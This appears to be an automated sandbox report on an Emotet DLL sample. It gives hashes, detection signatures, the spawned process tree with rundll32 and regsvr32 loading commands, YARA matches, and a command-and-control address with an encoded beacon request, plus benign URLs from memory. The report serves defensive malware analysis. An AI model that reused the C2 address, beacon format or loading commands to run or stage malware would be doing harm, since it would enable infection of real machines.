Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
auExrOTnvB.dll

Overview

General Information

Sample Name:auExrOTnvB.dll
Analysis ID:626499
MD5:e7d280d6c63840b28ca759ff07747ea1
SHA1:581dba2d1101e09dfeb290059c632ab266da49e3
SHA256:a1637271aa4a35c54d8df7f9c62bb31ae3bf58c9c390bc1b1ce717cdf3eaeb2c
Tags:exetrojan
Infos:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6296 cmdline: loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6332 cmdline: rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6320 cmdline: regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6436 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6348 cmdline: rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6428 cmdline: rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6640 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6704 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6744 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6880 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6908 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3172 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5588 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.278869387.0000026ED90D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.278205273.000002ACE68D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.663304380.00000000021F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            6.2.regsvr32.exe.21f0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.2ace68d0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.2ace68d0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  2.2.regsvr32.exe.d00000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.26ed90d0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: auExrOTnvB.dllVirustotal: Detection: 32%Perma Link
                      Source: https://23.239.0.12/gesAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/.Avira URL Cloud: Label: malware
                      Source: https://23.239.0.12/.Virustotal: Detection: 9%Perma Link
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: auExrOTnvB.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.662723758.0000000000594000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.662723758.0000000000594000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: atNMDL=8JgHocGxWkmbpKn0tdo/IhGKLaetTZOB/CiwzPMRN0PZhyEtDxX1w9ZLI3P1macWQoUNgjMjrDkFV/lcl2IUdBiaAKo/gu5s0aRFlnydObt5qsXc+/edR28d1nZ8xHaeYQHrD4ceCTW7KN3CrdFVrOL7q9OWe4HkOi3goo9OlcXUaAn+eDxsmLAXol1L25FR07tOlcKH8p3XLgKteJmTbxxCGtkK1PAkDHcHxGMAOGnU9j9YFxHv7IfNK/Gpzy6maq0gTlW77lz4Pep9U6Sgfe9I7o9D3xGrfSVCQRT4FKJSwZ8N4dh1GhrQvr/ywAH73tqOX8eJ8jwCp0YlcEzqrw2N9Ckstgco/YIpQ6fcHost: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 0000001E.00000003.535718680.000002740CD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000001E.00000003.535718680.000002740CD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000001E.00000003.535718680.000002740CD60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.535726549.000002740CD71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001E.00000003.535718680.000002740CD60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.535726549.000002740CD71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000002.663118095.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354338204.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.609167207.000001D672692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.663746213.000001DC60500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.581749046.000002740CD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000010.00000002.608997349.000001D672600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000002.663060683.0000000000896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000002.663020572.0000000000883000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354383215.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/.
                      Source: regsvr32.exe, 00000006.00000002.663020572.0000000000883000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354383215.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/ges
                      Source: svchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000C.00000003.329604876.0000026D25A69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330037413.0000026D25A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000C.00000002.329989904.0000026D25A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329728447.0000026D25A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000C.00000002.329989904.0000026D25A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329728447.0000026D25A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                      Source: svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
